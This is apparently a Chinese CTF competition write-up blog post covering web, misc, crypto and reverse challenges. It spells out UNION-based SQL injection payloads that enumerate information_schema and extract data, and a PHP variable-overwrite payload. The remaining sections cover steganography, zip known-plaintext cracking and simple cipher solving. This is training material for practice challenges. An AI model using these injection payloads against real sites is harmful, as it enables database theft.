比赛poc


web

web1

robots.txt协议

web2

简单sql注入

先查看有几个字段

1’ order by 4#

联合查询,查数据库

?id=-1’ union select 1,2,3,database()#

联合查询数据库的表

id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

查数据库中表的字段

id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=’fl4g’#

查询skctf_flag中的数据

id=-1’ union select 1,2,3,skctf_flag from fl4g#

web3

查看源代码发现只能上传图片

上传图片发现文件上传成功!filename:1.jpg
但要给我一个give_me_flag.php 我才给你flag!

bp抓包重放,send之后发现

我们在数据里面的最下面加入givemeflag

scend之后得到flag

web4

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($msg_giveme);
}

上面代码说明,不管是POST还是GER,必须带有’flag’参数。通过这里往下看

foreach ($_POST as $key => $value) {
    $$key = $value;

上面的源码这里可以变量覆盖

比如说传入flag=cc,则$flag=$cc

虽然传入flag参数后flag会被覆盖,但可以用别的变量保存flag。

传入a=flag&flag=a$a=$flag,$flag=$a

payload:?a=flag&flag=a

MISC

misc1

notepad++ 或者winhex或者记事本打开

直接搜索flag

misc2

解压得到两个文件 flag.zip(无法解压密码发现,里面有个文件和题目名字一样)猜测是明文攻击

先将 Yahiko.png zip压缩一下(必须要用winrar因为加密文件也是winrar压缩的)

misc

使用ARCHPR 工具

misc5

点击开始之后,过了一会在点击暂停,点击确定,自动跳到保存文件

misc5-1

解压进docx 文件

misc5-3

misc5-2

修改颜色

5-2

misc3

用foremost提取出一张bmp图片,

用stegsolve打开,Analyse选择Data Extract,勾选r,g,b的三个0通道,save bin得到flag的图片。

flag

misc4

用winhex打开搜索ctf

CRYPTO

CRYPTO1

下载打开发现有个txt,打开进去发现,有一串看不懂的代码

浏览器f12,复制到console中确定

CRYPTO2

下载打开发现凯撒关键字猜测凯撒密码,直接在线解码

key输入1得到flag

CRYPTO3

Caesar bought 64 rabbits(中文意思是凯撒买了64之兔子)

猜测是套娃,加密顺序可能是凯撒—>base64—>rabbits三种加密

按着题目给的意思,我们要倒着去解密,显示rabbit,64只兔子可能是复数+个s,Rabbits

在是base64

在是凯撒密码遍历1

逆向

ida打开文件,找到main函数f5,就能看到flag

得到的像个base64,base64解密下得到flag。


文章作者: yunhea
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yunhea !
评论
评论
  目录